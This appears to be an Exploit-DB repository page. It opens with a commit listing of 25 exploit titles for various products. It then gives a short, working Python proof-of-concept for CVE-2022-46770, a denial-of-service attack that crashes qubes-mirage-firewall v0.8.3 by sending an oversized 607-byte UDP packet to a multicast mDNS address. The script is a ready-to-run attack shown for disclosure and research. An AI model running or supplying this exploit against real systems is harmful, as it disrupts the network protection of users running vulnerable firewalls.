
25 changes to exploits/shellcodes/ghdb EQ Enterprise management system v2.2.0 - SQL Injection qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) ASKEY RTF3505VW-N1 - Privilege Escalation Bangresto 1.0 - SQL Injection Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) Cacti v1.2.22 - Remote Command Execution (RCE) Judging Management System v1.0 - Authentication Bypass Judging Management System v1.0 - Remote Code Execution (RCE) rconfig 3.9.7 - Sql Injection (Authenticated) Senayan Library Management System v9.0.0 - SQL Injection Spitfire CMS 1.0.475 - PHP Object Injection Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) WooCommerce v7.1.0 - Remote Code Execution(RCE) CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset SOUND4 Server Service 4.1.102 - Local Privilege Escalation macOS/x64 - Execve Null-Free Shellcode
24 lines
No EOL
631 B
Python
Executable file
24 lines
No EOL
631 B
Python
Executable file
# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
|
|
# Date: 2022-12-04
|
|
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
|
|
# Vendor Homepage: https://mirage.io/blog/MSA03
|
|
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
|
|
# Version: >= 0.8.0 & < 0.8.4
|
|
# Tested on: Qubes OS
|
|
# CVE: CVE-2022-46770
|
|
|
|
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
from socket import socket, AF_INET, SOCK_DGRAM
|
|
|
|
TARGET = "239.255.255.250"
|
|
|
|
PORT = 5353
|
|
|
|
PAYLOAD = b'a' * 607
|
|
|
|
s = socket(AF_INET, SOCK_DGRAM)
|
|
|
|
s.sendto(PAYLOAD, (TARGET, PORT)) |